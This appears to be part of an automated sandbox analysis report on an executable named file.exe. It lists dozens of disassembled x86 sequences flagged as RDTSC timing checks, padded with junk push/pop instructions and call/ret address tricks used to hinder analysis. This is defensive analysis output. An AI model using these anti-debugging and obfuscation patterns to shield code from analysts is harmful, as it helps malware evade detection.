            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542A5E second address: 542AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F45D5047A30h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F45D5047A28h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D2AC1h] 0x00000030 mov edi, dword ptr [ebp+122D2C1Ch] 0x00000036 push dword ptr fs:[00000000h] 0x0000003d sbb di, 6458h 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 mov eax, dword ptr [ebp+122D10C9h] 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007F45D5047A28h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 00000014h 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 or edi, dword ptr [ebp+122D2BACh] 0x0000006f push FFFFFFFFh 0x00000071 mov bh, al 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 jng 00007F45D5047A26h 0x0000007e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542AEC second address: 542AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544BAF second address: 544BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD2E second address: 54AD34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD34 second address: 54AD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD38 second address: 54AD3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544CA7 second address: 544CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD3C second address: 54ADD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F45D50449A8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push ebx 0x00000026 mov dword ptr [ebp+1245CCEFh], esi 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F45D50449A8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b jmp 00007F45D50449ACh 0x00000050 mov dword ptr [ebp+1245D6DCh], eax 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 jmp 00007F45D50449B9h 0x0000005d pushad 0x0000005e jmp 00007F45D50449AEh 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ADD6 second address: 54ADE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ADE3 second address: 54ADE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546F11 second address: 546F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546F17 second address: 546F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546F1C second address: 546FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+12477A74h], esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov di, B0C6h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F45D5047A28h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d clc 0x0000003e sub dword ptr [ebp+122D3896h], esi 0x00000044 mov eax, dword ptr [ebp+122D1091h] 0x0000004a xor di, 3598h 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007F45D5047A28h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 0000001Dh 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b mov edi, 0B136976h 0x00000070 nop 0x00000071 push edx 0x00000072 pushad 0x00000073 pushad 0x00000074 popad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54CE7C second address: 54CE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449ADh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548FEB second address: 548FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F45D5047A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549097 second address: 5490AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F45D50449A6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490AA second address: 5490BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480D2 second address: 5480E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F45D50449A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007F45D50449B0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54BFA5 second address: 54BFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D17E second address: 54D188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F45D50449A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E176 second address: 54E184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E26A second address: 54E278 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F162 second address: 54F166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552474 second address: 552478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1D60 second address: 4F1D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F45D5047A2Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1D71 second address: 4F1D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1D77 second address: 4F1D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1D7D second address: 4F1D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1D81 second address: 4F1D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1D8D second address: 4F1D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55959B second address: 55959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55959F second address: 5595AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5595AA second address: 5595C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D5047A2Bh 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5595C4 second address: 5595C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5595C9 second address: 5595CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559779 second address: 55977D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55977D second address: 559793 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F45D5047A2Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559793 second address: 5597B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F45D50449A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jl 00007F45D50449AAh 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5597B1 second address: 5597BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5597BD second address: 5597C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5597C3 second address: 5597C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5597C7 second address: 5597CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5597CB second address: 5597D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5597D1 second address: 5597E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D50449AAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5597E1 second address: 5597EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5603E8 second address: 5603F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F45D50449A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5604E2 second address: 5604E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5604E6 second address: 560526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F45D50449B4h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jno 00007F45D50449A6h 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560714 second address: 560723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560723 second address: 560728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560728 second address: 560733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F45D5047A26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560733 second address: 560750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45D50449B0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560750 second address: 56078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jno 00007F45D5047A45h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5669A8 second address: 5669B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F45D50449A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5669B7 second address: 5669BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 565BF4 second address: 565C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D50449B0h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 565C0A second address: 565C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 565DFC second address: 565E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 565E00 second address: 565E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F45D5047A2Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566682 second address: 56669F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F45D50449AFh 0x0000000b jbe 00007F45D50449A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56669F second address: 5666A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5666A4 second address: 5666A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5666A9 second address: 5666D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007F45D5047A28h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F45D5047A35h 0x00000016 jo 00007F45D5047A3Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5666D7 second address: 5666EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566870 second address: 56687C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56687C second address: 566882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566882 second address: 566886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534A3F second address: 534A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449ACh 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F45D50449AAh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F45D50449A8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b lea eax, dword ptr [ebp+1247C70Bh] 0x00000031 cmc 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534A88 second address: 534A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534A8C second address: 51ADB6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F45D50449A8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push ebx 0x0000002d mov ecx, dword ptr [ebp+122D2A47h] 0x00000033 pop edi 0x00000034 mov ecx, 6A9BBE60h 0x00000039 call dword ptr [ebp+122D3831h] 0x0000003f je 00007F45D50449BAh 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 pop edi 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535094 second address: 535098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535098 second address: 53509C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53509C second address: 5350A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350A2 second address: 5350C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45D50449B0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535A60 second address: 535A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535A66 second address: 535A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535A6A second address: 535AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F45D5047A39h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D32E0h] 0x00000015 push 0000001Eh 0x00000017 mov di, 519Ch 0x0000001b nop 0x0000001c jmp 00007F45D5047A2Ah 0x00000021 push eax 0x00000022 jo 00007F45D5047A45h 0x00000028 pushad 0x00000029 jmp 00007F45D5047A37h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535E62 second address: 535E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535E66 second address: 535E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535E6A second address: 535E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F45D50449B8h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jg 00007F45D50449A6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535F8E second address: 535F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535F92 second address: 51B833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F45D50449AAh 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 adc ecx, 71C99689h 0x00000019 sbb di, 3AD2h 0x0000001e call dword ptr [ebp+122D18B6h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B833 second address: 51B854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B854 second address: 51B882 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F45D50449B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F45D50449B1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D854 second address: 56D878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F45D5047A32h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45D5047A2Ah 0x00000013 rdtsc
